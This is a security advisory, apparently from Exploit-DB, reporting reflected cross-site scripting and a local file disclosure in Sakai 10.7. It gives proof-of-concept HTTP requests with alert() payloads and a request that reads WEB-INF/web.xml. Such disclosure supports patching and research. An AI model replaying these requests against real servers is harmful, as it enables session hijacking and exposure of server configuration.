Sakai 10.7 - Multiple Vulnerabilities

EDB-ID:

40286

CVE:

N/A




Platform:

Java

Date:

2016-08-22


Sakai 10.7 Multiple Vulnerabilities


Vendor: Apereo Foundation
Product web page: https://www.sakaiproject.org
Affected version: 10.7 (Kernel 10.7)

Summary: Sakai is a free, community source, educational software
platform designed to support teaching, research and collaboration.
Systems of this type are also known as Course Management Systems (CMS),
Learning Management Systems (LMS), or Virtual Learning Environments (VLE).

Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site. Also there is a file disclosure vulnerability when calling
custom tool script. It is not properly verified before being used to read files.
This can be exploited to disclose contents of files from local resources.

Tested on: Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5358
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php

Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param)
        https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job)
        https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI)
        https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools)
        


29.06.2016

--


XSS when using file upload (filename parameter):
------------------------------------------------

POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

------WebKitFormBoundaryViazQNB5ok9E64l2
Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo"
Content-Type: application/octet-stream

testingus
------WebKitFormBoundaryViazQNB5ok9E64l2--


Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=EmulateIE11
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 383
Date: Wed, 29 Jun 2016 11:45:49 GMT
Connection: close

<script type="text/javascript">
(function(){ var d = document.domain ; while ( true ) {
try { var test = parent.document.domain ; break ; } catch( e ) {}
d = d.replace( /.*?(?:\.|$)/, '' ) ; if ( d.length == 0 ) break ;
try { document.domain = d ; } catch (e) { break ; }}})() ;
window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo','');
</script>




XSS when creating a job (After creating a job, click on "Triggers" link):
-------------------------------------------------------------------------

GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1
Host: localhost:8080



XSS in URI:
-----------

GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1
Host: localhost:8080


LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics.
Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting:
/portal/tool/[TOOL_ID]/WEB-INF/web.xml):
----------------------------------------

GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1
Host: localhost:8080